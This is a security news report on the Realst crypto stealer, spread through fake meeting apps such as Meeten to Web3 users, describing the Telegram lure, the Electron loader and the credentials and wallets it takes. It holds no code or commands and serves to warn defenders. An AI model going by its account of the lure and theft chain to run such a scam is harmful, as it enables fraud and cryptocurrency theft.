A new scam effort has been observed targeting Web3 leveraging fake video conferencing applications to deliver an information stealer dubbed Realst.
Realst crypto stealer has been active for almost four months and targets both macOS and Windows users.
Operating under the guise of reputable firms such as “Meetio,” and with names such as Clusee, Cuesee, Meeten, and Meetone, the attackers utilize AI-generated content to establish convincing websites and social media profiles to disseminate malware.
The company contacts targets to arrange a video conversation, asking the user to download the meeting application from the website, which is a Realst info-stealer.
Meeten Malware Attacking macOS And Windows Users
Targets have reported that scams are carried out using a variety of methods. In one documented case, a user received a message on Telegram from a friend who wanted to arrange a conversation and talk about a business opportunity.
Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar
However, the purpose of the Telegram account was to be one of the target’s contacts.
The fact that the fraudster delivered the target an investment presentation from the target’s business is even more intriguing and suggests that the deception was well-planned.
Reports say the targeted victims downloaded the program, were on calls pertaining to Web3 work, and had their cryptocurrency stolen.
“After initial contact, the target would be directed to the Meeten website to download the product. In addition to hosting information stealers, the Meeten websites contain Javascript to steal cryptocurrency that is stored in web browsers, even before installing any malware”, Cado Security Labs said.
The malware iterates through several data stores, extracts sensitive information, creates a folder to hold the data, and then exfiltrates it as a zip.
Realst Stealer exfiltrates the following information:
- Telegram credentials
- Banking card details
- Keychain credentials
- Browser cookies and autofill credentials from Google Chrome, Opera, Brave, Microsoft Edge, Arc, CocCoc, and Vivaldi
- Ledger Wallets
- Trezor Wallets
The malware’s Windows version was spotted by the researchers. The binary “MeetenApp.exe” is a Nullsoft Scriptable Installer System (NSIS) file with a valid signature from “Brys Software” that was most likely stolen.
The installation includes an Electron application that is configured to retrieve the stealer executable, a Rust-based binary, from an attacker-controlled domain.
The Rust-based binary UpdateMC.exe functions similarly to the macOS version. The hacker gathers and exfiltrates sensitive data in a zip file by searching multiple data stores.
Meeten can steal information from:
- Telegram credentials
- Banking card details
- Browser cookies, history and autofill credentials from Google Chrome, Opera, Brave, Microsoft Edge, Arc, CocCoc, and Vivaldi
- Ledger Wallets
- Trezor Wallets
- Phantom Wallets
- Binance Wallets
As Electron apps grow more prevalent, users must remain attentive by validating sources, enforcing rigorous security protocols, and monitoring unusual activities.
Users should be cautious of being solicited about commercial opportunities, particularly via Telegram. It’s crucial to confirm the account and exercise caution whenever clicking links, even if the contact seems to be an established contact.
Analyse Real-World Malware & Phishing Attacks With ANY.RUN - Get up to 3 Free Licenses
